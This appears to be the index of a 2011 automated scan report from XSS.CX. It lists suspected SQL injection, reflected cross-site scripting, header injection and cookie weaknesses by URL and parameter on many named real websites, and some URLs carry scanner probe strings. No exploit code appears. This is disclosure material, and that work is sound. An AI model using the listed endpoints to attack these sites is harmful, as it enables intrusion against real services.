Reflected XSS, SQL Injection, HTTP HEader Injection, Response Splitting, DORK GHRB Report on April 25, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Apr 25 10:22:20 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

1.3. https://www.depthsecurity.com/WebResource.axd [d parameter]

1.4. https://www.depthsecurity.com/WebResource.axd [t parameter]

1.5. http://www.eset.com/us/ [PHPSESSID cookie]

1.6. http://www.trucklist.ru/cars/undefined [REST URL parameter 1]

1.7. http://www.trucklist.ru/cars/undefined [REST URL parameter 2]

1.8. http://www.trucklist.ru/favicon.ico [REST URL parameter 1]

1.9. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3]

1.10. http://www.trucklist.ru/plugins/ajax/enums.php [name of an arbitrarily supplied request parameter]

1.11. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3]

1.12. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4]

1.13. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4]

1.14. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4]

1.15. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4]

1.16. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4]

1.17. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4]

1.18. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4]

1.19. http://www.trucklist.ru/webroot/delivery/js/windows/javascripts/window.js [REST URL parameter 6]

1.20. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6]

1.21. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alphacube.css [REST URL parameter 6]

1.22. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6]

2. LDAP injection

3. Cross-site scripting (stored)

4. HTTP header injection

4.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]

4.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

4.3. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2]

4.4. http://pretty.ru/favicon.ico [REST URL parameter 1]

5. Cross-site scripting (reflected)

5.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

5.2. http://an.yandex.ru/code/47934 [target-ref parameter]

5.3. http://an.yandex.ru/code/57617 [target-ref parameter]

5.4. http://an.yandex.ru/code/66894 [target-ref parameter]

5.5. http://ar.voicefive.com/b/rc.pli [func parameter]

5.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]

5.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]

5.8. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]

5.9. http://event.adxpose.com/event.flow [uid parameter]

5.10. https://hourly.deploy.com/hmc/report/ ['"--> parameter]

5.11. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]

5.12. https://hourly.deploy.com/hmc/report/ [nsextt parameter]

5.13. https://hourly.deploy.com/hmc/report/ [register parameter]

5.14. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter]

5.15. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]

5.16. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]

5.17. https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter]

5.18. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]

5.19. https://hourly.deploy.com/hmc/report/index.cfm [register parameter]

5.20. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter]

5.21. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter]

5.22. http://ib.adnxs.com/ab [cnd parameter]

5.23. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]

5.24. http://kroogy.com/favicon.ico [REST URL parameter 1]

5.25. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.26. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

5.27. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]

5.28. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]

5.29. http://ok.mail.ru/cookie-token.do [client_id parameter]

5.30. http://ok.mail.ru/cookie-token.do [remove parameter]

5.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.32. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]

5.33. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]

5.34. http://shopping.netsuite.com/s.nl [alias parameter]

5.35. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

5.36. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]

5.37. http://widgets.digg.com/buttons/count [url parameter]

5.38. https://www.controlscan.com/save_order.php [company parameter]

5.39. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]

5.40. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]

5.41. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]

5.42. http://www.google.com/search [tch parameter]

5.43. http://www.stillsecure.com/m/ [comments parameter]

5.44. http://www.stillsecure.com/m/ [company parameter]

5.45. http://www.stillsecure.com/m/ [email parameter]

5.46. http://www.stillsecure.com/m/ [firstName parameter]

5.47. http://www.stillsecure.com/m/ [lastName parameter]

5.48. http://www.stillsecure.com/m/ [phone parameter]

5.49. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header]

5.50. http://www.eset.com/business/server-security/linux-file [Referer HTTP header]

5.51. http://www.eset.com/us [Referer HTTP header]

5.52. http://www.eset.com/us/ [Referer HTTP header]

5.53. http://www.eset.com/us/business/products [Referer HTTP header]

5.54. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]

5.55. http://www.eset.com/us/home/smart-security [Referer HTTP header]

5.56. http://www.eset.com/us/store [Referer HTTP header]

5.57. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]

5.58. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]

5.59. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.60. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.61. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.62. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.63. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.64. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.65. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.66. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.67. http://forums.manageengine.com/fbw [zdccn cookie]

5.68. http://forums.manageengine.com/fbw [zdccn cookie]

6. Flash cross-domain policy

6.1. http://195.68.160.134/crossdomain.xml

6.2. http://195.68.160.166/crossdomain.xml

6.3. http://195.68.160.167/crossdomain.xml

6.4. http://195.68.160.40/crossdomain.xml

6.5. http://195.68.160.95/crossdomain.xml

6.6. http://ad.afy11.net/crossdomain.xml

6.7. http://ad.doubleclick.net/crossdomain.xml

6.8. http://api.facebook.com/crossdomain.xml

6.9. http://b.voicefive.com/crossdomain.xml

6.10. http://beacon.securestudies.com/crossdomain.xml

6.11. http://bs.mail.ru/crossdomain.xml

6.12. http://bs.yandex.ru/crossdomain.xml

6.13. http://cdn-01.yumenetworks.com/crossdomain.xml

6.14. http://counter.rambler.ru/crossdomain.xml

6.15. http://d7.zedo.com/crossdomain.xml

6.16. http://event.adxpose.com/crossdomain.xml

6.17. http://games.mochiads.com/crossdomain.xml

6.18. http://goods.adnectar.com/crossdomain.xml

6.19. http://goods43.adnectar.com/crossdomain.xml

6.20. http://img.en25.com/crossdomain.xml

6.21. http://learn.shavlik.com/crossdomain.xml

6.22. http://m.adnxs.com/crossdomain.xml

6.23. http://map.media6degrees.com/crossdomain.xml

6.24. http://mbox5.offermatica.com/crossdomain.xml

6.25. http://pda.loveplanet.ru/crossdomain.xml

6.26. http://pixel.fetchback.com/crossdomain.xml

6.27. http://pixel.quantserve.com/crossdomain.xml

6.28. http://pl.yumenetworks.com/crossdomain.xml

6.29. http://playspal.com/crossdomain.xml

6.30. http://pretty.ru/crossdomain.xml

6.31. http://r2.mail.ru/crossdomain.xml

6.32. http://rbcgaru.hit.gemius.pl/crossdomain.xml

6.33. http://rs.mail.ru/crossdomain.xml

6.34. http://s0.2mdn.net/crossdomain.xml

6.35. http://search.twitter.com/crossdomain.xml

6.36. http://widgets.fotocash.ru/crossdomain.xml

6.37. http://gomail.radar.imgsmail.ru/crossdomain.xml

6.38. http://googleads.g.doubleclick.net/crossdomain.xml

6.39. http://imagesrv.gartner.com/crossdomain.xml

6.40. http://img.dt00.net/crossdomain.xml

6.41. http://img.imgsmail.ru/crossdomain.xml

6.42. http://img.mail.ru/crossdomain.xml

6.43. http://js.dt00.net/crossdomain.xml

6.44. http://mail.radar.imgsmail.ru/crossdomain.xml

6.45. http://mail.ru/crossdomain.xml

6.46. http://odnoklassniki.ru/crossdomain.xml

6.47. http://oth.dt00.net/crossdomain.xml

6.48. http://www.gartner.com/crossdomain.xml

6.49. http://www.livejournal.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.voicefive.com/clientaccesspolicy.xml

7.3. http://beacon.securestudies.com/clientaccesspolicy.xml

7.4. http://pl.yumenetworks.com/clientaccesspolicy.xml

7.5. http://s0.2mdn.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://direct.yandex.ru/

8.2. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

8.3. http://mail.ru/

8.4. http://my.webalta.ru/public/engine/templates.js

8.5. http://my.webalta.ru/public/engine/templates.js

8.6. http://odnoklassniki.ru/

8.7. http://pda.loveplanet.ru/

8.8. http://pretty.ru/

8.9. http://vkontakte.ru/

8.10. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

9. XML injection

9.1. http://api.facebook.com/restserver.php [format parameter]

9.2. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]

9.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]

9.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]

10. SQL statement in request parameter

10.1. https://checkout.netsuite.com/core/media/media.nl

10.2. https://checkout.netsuite.com/core/styles/pagestyles.nl

10.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

10.4. https://checkout.netsuite.com/s.nl

10.5. https://employer.unicru.com/asp/home/login.asp

10.6. https://hourly.deploy.com/hmc/report/

10.7. https://hourly.deploy.com/hmc/report/index.cfm

10.8. http://learn.shavlik.com/shavlik/index.cfm

11. SSL cookie without secure flag set

11.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

11.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

11.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

11.4. https://checkout.netsuite.com/core/

11.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

11.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

11.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

11.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

11.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

11.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

11.11. https://checkout.netsuite.com/core/styles/pagestyles.nl

11.12. https://checkout.netsuite.com/pages/portal/css/main.css

11.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

11.14. https://checkout.netsuite.com/s.nl

11.15. https://customer.kronos.com/Default.asp

11.16. https://employer.unicru.com/asp/home/login.asp

11.17. https://employer.unicru.com/asp/home/login.asp

11.18. https://employer.unicru.com/asp/home/login.asp

11.19. https://employer.unicru.com/asp/home/login.asp

11.20. https://hourly.deploy.com/hmc/report/

11.21. https://hourly.deploy.com/hmc/report/index.cfm

11.22. https://www.fusionvm.com/FusionVM/

11.23. https://checkout.netsuite.com/s

11.24. https://customer.kronos.com/Default.asp

11.25. https://customer.kronos.com/user/forgotpassword.asp

11.26. https://customer.kronos.com/user/forgotusername.asp

11.27. https://customer.kronos.com/user/logindenied.asp

12. Session token in URL

12.1. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard

12.2. http://mbox5.offermatica.com/m2/netsuite/mbox/standard

12.3. http://mbox9e.offermatica.com/m2/eset/mbox/standard

12.4. http://shopping.netsuite.com/app/site/query/additemtocart.nl

12.5. http://shopping.netsuite.com/s.nl

13. Password field submitted using GET method

13.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

13.2. https://hourly.deploy.com/hmc/report/

13.3. https://hourly.deploy.com/hmc/report/index.cfm

13.4. http://my.webalta.ru/public/engine/templates.js

13.5. http://my.webalta.ru/public/engine/templates.js

14. Open redirection

15. Cookie scoped to parent domain

15.1. http://www.gartner.com/technology/contact/contact_gartner.jsp

15.2. http://www.trucklist.ru/cars/trucks

15.3. http://ad.afy11.net/ad

15.4. http://ad.amgdgt.com/ads/

15.5. http://ad.trafficmp.com/a/bpix

15.6. http://ad.trafficmp.com/a/bpix

15.7. http://ar.voicefive.com/b/wc_beacon.pli

15.8. http://ar.voicefive.com/bmx3/broker.pli

15.9. http://b.scorecardresearch.com/b

15.10. http://b.scorecardresearch.com/p

15.11. http://b.voicefive.com/b

15.12. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

15.13. http://core1.node15.top.mail.ru/counter

15.14. http://core2.node12.top.mail.ru/counter

15.15. http://d7.zedo.com/img/bh.gif

15.16. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter

15.17. http://goods.adnectar.com/analytics/get_avia_js

15.18. http://ib.adnxs.com/ab

15.19. http://ib.adnxs.com/pxj

15.20. http://idcs.interclick.com/Segment.aspx

15.21. http://m.adnxs.com/msftcookiehandler

15.22. http://map.media6degrees.com/orbserv/aopix

15.23. http://mc.yandex.ru/watch/57617

15.24. http://pixel.fetchback.com/serve/fb/pdc

15.25. http://pixel.quantserve.com/pixel

15.26. http://pixel.rubiconproject.com/tap.php

15.27. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil

15.28. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

15.29. http://pogoda.webalta.ru/

15.30. http://r2.mail.ru/b12179277.gif

15.31. http://r2.mail.ru/b12179279.gif

15.32. http://r2.mail.ru/b12179280.gif

15.33. http://r2.mail.ru/b12201458.png

15.34. http://r2.mail.ru/b12526055.gif

15.35. http://r2.mail.ru/b12526056.jpg

15.36. http://r2.mail.ru/b12526057.jpg

15.37. http://r2.mail.ru/b12526058.jpg

15.38. http://r2.mail.ru/b12526059.jpg

15.39. http://r2.mail.ru/b12526060.jpg

15.40. http://r2.mail.ru/b12526061.jpg

15.41. http://r2.mail.ru/b12526062.jpg

15.42. http://r2.mail.ru/b12526063.jpg

15.43. http://r2.mail.ru/b12526064.jpg

15.44. http://r2.mail.ru/b12526065.gif

15.45. http://r2.mail.ru/b12526191.gif

15.46. http://r2.mail.ru/b12526192.gif

15.47. http://r2.mail.ru/b12526193.gif

15.48. http://r2.mail.ru/b12526194.gif

15.49. http://r2.mail.ru/b12526208.gif

15.50. http://r2.mail.ru/b12526210.gif

15.51. http://r2.mail.ru/b12527647.gif

15.52. http://r2.mail.ru/b12529050.jpg

15.53. http://r2.mail.ru/b12530142.jpg

15.54. http://r2.mail.ru/b12530159.jpg

15.55. http://r2.mail.ru/b12531249.jpg

15.56. http://r2.mail.ru/b12531545.jpg

15.57. http://r2.mail.ru/b12531624.jpg

15.58. http://r2.mail.ru/b12532203.jpg

15.59. http://r2.mail.ru/b12752186.jpg

15.60. http://r2.mail.ru/b12752583.jpg

15.61. http://r2.mail.ru/b12752584.jpg

15.62. http://r2.mail.ru/b12752585.jpg

15.63. http://r2.mail.ru/b12752586.jpg

15.64. http://r2.mail.ru/b12855502.png

15.65. http://r2.mail.ru/b12887675.jpg

15.66. http://r2.mail.ru/b12887676.jpg

15.67. http://r2.mail.ru/b12887677.jpg

15.68. http://r2.mail.ru/b12961140.jpg

15.69. http://r2.mail.ru/b12961154.jpg

15.70. http://r2.mail.ru/b12961373.jpg

15.71. http://r2.mail.ru/b12962356.jpg

15.72. http://r2.mail.ru/b12963308.jpg

15.73. http://r2.mail.ru/b12965362.jpg

15.74. http://r2.mail.ru/b12968616.jpg

15.75. http://r2.mail.ru/b12979027.jpg

15.76. http://r2.mail.ru/b13039712.jpg

15.77. http://r2.mail.ru/b13044176.jpg

15.78. http://r2.mail.ru/b13049054.jpg

15.79. http://r2.mail.ru/b13050852.jpg

15.80. http://r2.mail.ru/b13057590.swf

15.81. http://r2.mail.ru/b13058787.jpg

15.82. http://r2.mail.ru/b13058840.jpg

15.83. http://r2.mail.ru/b13058851.jpg

15.84. http://r2.mail.ru/b13058852.jpg

15.85. http://r2.mail.ru/b13058968.jpg

15.86. http://r2.mail.ru/b13059223.jpg

15.87. http://r2.mail.ru/b13059860.jpg

15.88. http://r2.mail.ru/b13060405.jpg

15.89. http://r2.mail.ru/b13060487.jpg

15.90. http://r2.mail.ru/b13061099.jpg

15.91. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif

15.92. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif

15.93. http://segment-pixel.invitemedia.com/pixel

15.94. http://storage.trafic.ro/js/trafic.js

15.95. http://top5.mail.ru/counter

15.96. http://www.livejournal.com/tools/endpoints/journalspotlight.bml

15.97. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

16. Cookie without HttpOnly flag set

16.1. http://ads.adxpose.com/ads/ads.js

16.2. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

16.3. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

16.4. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

16.5. https://checkout.netsuite.com/core/

16.6. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

16.7. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

16.8. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

16.9. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

16.10. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

16.11. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

16.12. https://checkout.netsuite.com/core/styles/pagestyles.nl

16.13. https://checkout.netsuite.com/pages/portal/css/main.css

16.14. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

16.15. https://checkout.netsuite.com/s.nl

16.16. http://customer.kronos.com/

16.17. https://customer.kronos.com/Default.asp

16.18. https://employer.unicru.com/asp/home/login.asp

16.19. https://employer.unicru.com/asp/home/login.asp

16.20. https://employer.unicru.com/asp/home/login.asp

16.21. https://employer.unicru.com/asp/home/login.asp

16.22. http://event.adxpose.com/event.flow

16.23. https://hourly.deploy.com/hmc/report/

16.24. https://hourly.deploy.com/hmc/report/index.cfm

16.25. http://partner-support.wiki.zoho.com/

16.26. http://partners.criticalwatch.com/

16.27. http://shopping.netsuite.com/app/site/hit/tracker.nl

16.28. http://shopping.netsuite.com/app/site/query/additemtocart.nl

16.29. http://shopping.netsuite.com/core/styles/pagestyles.nl

16.30. http://shopping.netsuite.com/s.nl

16.31. http://t5.trackalyzer.com/trackalyze.asp

16.32. http://tengrinews.kz/tag/891/

16.33. http://www.fusionvm.com/

16.34. http://www.gartner.com/technology/contact/contact_gartner.jsp

16.35. http://www.iveco-ptc.spb.ru/

16.36. http://www.netsuite.com/app/site/hit/tracker.nl

16.37. http://www.smpone.com/images/captcha.php

16.38. http://www.tresware.com/images/captcha.php

16.39. http://www.trucklist.ru/cars/trucks

16.40. http://ad.afy11.net/ad

16.41. http://ad.amgdgt.com/ads/

16.42. http://ad.trafficmp.com/a/bpix

16.43. http://ad.trafficmp.com/a/bpix

16.44. http://ad.yieldmanager.com/pixel

16.45. http://an.yandex.ru/code/47934

16.46. http://an.yandex.ru/code/57617

16.47. http://an.yandex.ru/code/66894

16.48. http://ar.voicefive.com/b/wc_beacon.pli

16.49. http://ar.voicefive.com/bmx3/broker.pli

16.50. http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554

16.51. http://b.scorecardresearch.com/b

16.52. http://b.scorecardresearch.com/p

16.53. http://b.voicefive.com/b

16.54. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

16.55. http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407

16.56. http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795

16.57. http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021

16.58. http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368

16.59. http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168

16.60. http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170

16.61. http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367

16.62. http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191

16.63. http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087

16.64. http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316

16.65. http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183

16.66. https://checkout.netsuite.com/s

16.67. http://core1.node15.top.mail.ru/counter

16.68. http://core2.node12.top.mail.ru/counter

16.69. http://count.rbc.ru/p712.gif

16.70. https://customer.kronos.com/Default.asp

16.71. https://customer.kronos.com/user/forgotpassword.asp

16.72. https://customer.kronos.com/user/forgotusername.asp

16.73. https://customer.kronos.com/user/logindenied.asp

16.74. http://d7.zedo.com/img/bh.gif

16.75. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter

16.76. http://goods.adnectar.com/analytics/get_avia_js

16.77. http://idcs.interclick.com/Segment.aspx

16.78. http://ideco-software.ru/products/ims/

16.79. http://imagesrv.gartner.com/cio/css/main.css

16.80. http://imagesrv.gartner.com/js/utility_tech.js

16.81. http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826

16.82. http://mail.ru/

16.83. http://map.media6degrees.com/orbserv/aopix

16.84. http://mc.yandex.ru/watch/57617

16.85. http://pda.loveplanet.ru/

16.86. http://pixel.fetchback.com/serve/fb/pdc

16.87. http://pixel.quantserve.com/pixel

16.88. http://pixel.rubiconproject.com/tap.php

16.89. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil

16.90. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

16.91. http://pogoda.webalta.ru/

16.92. http://pretty.ru/

16.93. http://r2.mail.ru/b12179277.gif

16.94. http://r2.mail.ru/b12179279.gif

16.95. http://r2.mail.ru/b12179280.gif

16.96. http://r2.mail.ru/b12201458.png

16.97. http://r2.mail.ru/b12526055.gif

16.98. http://r2.mail.ru/b12526056.jpg

16.99. http://r2.mail.ru/b12526057.jpg

16.100. http://r2.mail.ru/b12526058.jpg

16.101. http://r2.mail.ru/b12526059.jpg

16.102. http://r2.mail.ru/b12526060.jpg

16.103. http://r2.mail.ru/b12526061.jpg

16.104. http://r2.mail.ru/b12526062.jpg

16.105. http://r2.mail.ru/b12526063.jpg

16.106. http://r2.mail.ru/b12526064.jpg

16.107. http://r2.mail.ru/b12526065.gif

16.108. http://r2.mail.ru/b12526191.gif

16.109. http://r2.mail.ru/b12526192.gif

16.110. http://r2.mail.ru/b12526193.gif

16.111. http://r2.mail.ru/b12526194.gif

16.112. http://r2.mail.ru/b12526208.gif

16.113. http://r2.mail.ru/b12526210.gif

16.114. http://r2.mail.ru/b12527647.gif

16.115. http://r2.mail.ru/b12529050.jpg

16.116. http://r2.mail.ru/b12530142.jpg

16.117. http://r2.mail.ru/b12530159.jpg

16.118. http://r2.mail.ru/b12531249.jpg

16.119. http://r2.mail.ru/b12531545.jpg

16.120. http://r2.mail.ru/b12531624.jpg

16.121. http://r2.mail.ru/b12532203.jpg

16.122. http://r2.mail.ru/b12752186.jpg

16.123. http://r2.mail.ru/b12752583.jpg

16.124. http://r2.mail.ru/b12752584.jpg

16.125. http://r2.mail.ru/b12752585.jpg

16.126. http://r2.mail.ru/b12752586.jpg

16.127. http://r2.mail.ru/b12855502.png

16.128. http://r2.mail.ru/b12887675.jpg

16.129. http://r2.mail.ru/b12887676.jpg

16.130. http://r2.mail.ru/b12887677.jpg

16.131. http://r2.mail.ru/b12961140.jpg

16.132. http://r2.mail.ru/b12961154.jpg

16.133. http://r2.mail.ru/b12961373.jpg

16.134. http://r2.mail.ru/b12962356.jpg

16.135. http://r2.mail.ru/b12963308.jpg

16.136. http://r2.mail.ru/b12965362.jpg

16.137. http://r2.mail.ru/b12968616.jpg

16.138. http://r2.mail.ru/b12979027.jpg

16.139. http://r2.mail.ru/b13039712.jpg

16.140. http://r2.mail.ru/b13044176.jpg

16.141. http://r2.mail.ru/b13049054.jpg

16.142. http://r2.mail.ru/b13050852.jpg

16.143. http://r2.mail.ru/b13057590.swf

16.144. http://r2.mail.ru/b13058787.jpg

16.145. http://r2.mail.ru/b13058840.jpg

16.146. http://r2.mail.ru/b13058851.jpg

16.147. http://r2.mail.ru/b13058852.jpg

16.148. http://r2.mail.ru/b13058968.jpg

16.149. http://r2.mail.ru/b13059223.jpg

16.150. http://r2.mail.ru/b13059860.jpg

16.151. http://r2.mail.ru/b13060405.jpg

16.152. http://r2.mail.ru/b13060487.jpg

16.153. http://r2.mail.ru/b13061099.jpg

16.154. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif

16.155. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif

16.156. http://segment-pixel.invitemedia.com/pixel

16.157. http://shopping.netsuite.com/s.nl

16.158. http://show.multiclick.ru/blank.php

16.159. http://stats.kroogy.com/cnt-gif1x1.php

16.160. http://storage.trafic.ro/js/trafic.js

16.161. http://t2.trackalyzer.com/trackalyze.asp

16.162. http://top5.mail.ru/counter

16.163. http://translate.googleapis.com/translate_a/t

16.164. http://vkontakte.ru/login.php

16.165. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

16.166. http://www.eset.com/us/

16.167. https://www.fusionvm.com/FusionVM/

16.168. http://www.gartner.com/0_admin/css/documentdisplay.css

16.169. http://www.gartner.com/0_admin/css/docverterNGRA.css

16.170. http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif

16.171. http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif

16.172. http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif

16.173. http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif

16.174. http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif

16.175. http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif

16.176. http://www.gartner.com/DisplayDocument

16.177. http://www.gartner.com/images/x.gif

16.178. http://www.gartner.com/js/utility.js

16.179. http://www.gartner.com/js/webtrendsCookies.js

16.180. http://www.googleadservices.com/pagead/conversion/1069716420/

16.181. http://www.googleadservices.com/pagead/conversion/1072501689/

16.182. http://www.kronos.com/

16.183. http://www.livejournal.com/tools/endpoints/journalspotlight.bml

16.184. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T

16.185. http://www.smpone.com/

16.186. http://www.smpone.com/404.php

16.187. http://www.smpone.com/News-more-79.html

16.188. http://www.smpone.com/News-more-80.html

16.189. http://www.smpone.com/News.html

16.190. http://www.smpone.com/Sections-read-10.html

16.191. http://www.smpone.com/Sections-read-125.html

16.192. http://www.smpone.com/Sections-read-126.html

16.193. http://www.smpone.com/Sections-read-16.html

16.194. http://www.smpone.com/Sections-read-20.html

16.195. http://www.smpone.com/Sections-read-21.html

16.196. http://www.smpone.com/Sections-read-29.html

16.197. http://www.smpone.com/Sections-read-3.html

16.198. http://www.smpone.com/Sections-read-30.html

